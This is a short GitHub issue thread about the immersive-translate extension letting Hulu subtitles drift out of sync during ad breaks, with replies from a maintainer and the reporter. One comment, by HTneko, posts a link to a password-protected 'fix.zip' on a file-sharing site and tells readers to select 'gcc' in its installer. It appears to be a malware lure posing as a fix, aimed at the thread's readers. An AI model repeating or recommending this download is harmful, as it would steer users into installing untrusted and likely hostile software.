### ISSUE TITLE
[Bug]: hulu字幕因插播广告导致视频字幕不同步

### ISSUE THREAD

**Issue by satoukaitou** [immersive-translate/immersive-translate#2057]
### 插件版本号 | Version

1.8.3

### 平台 | Platform

macOS

### 浏览器 | Browsers

Chrome, Safari

### 插件类型 | Extension Type

浏览器插件 | Browser Extension

### 请描述这个Bug | Describe the bug

hulu含广告的订阅用户，在观看视频过程中有贴片广告或插入广告时，广告期间视频字幕仍然继续播放显示，导致广告结束后视频字幕不同步。已经尝试过多台设备多款浏览器使用都是一样的情况，除非我开通无广告的hulu套餐。请问有办法解决吗？

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by theowenyoung** [comment]
您好，不太熟悉 hulu 的广告出现规则，请问可以发一个会出现广告的视频地址吗？

**Comment by satoukaitou** [comment]
广告版就是所有的视频都会含广告的呀贴片和插播广告的 hulu (with ad)发自我的 iPhone在 2024年8月30日，下午7:08，Owen ***@***.***> 写道：﻿
您好，不太熟悉 hulu 的广告出现规则，请问可以发一个会出现广告的视频地址吗？

**Comment by FattySpring** [comment]
已修复
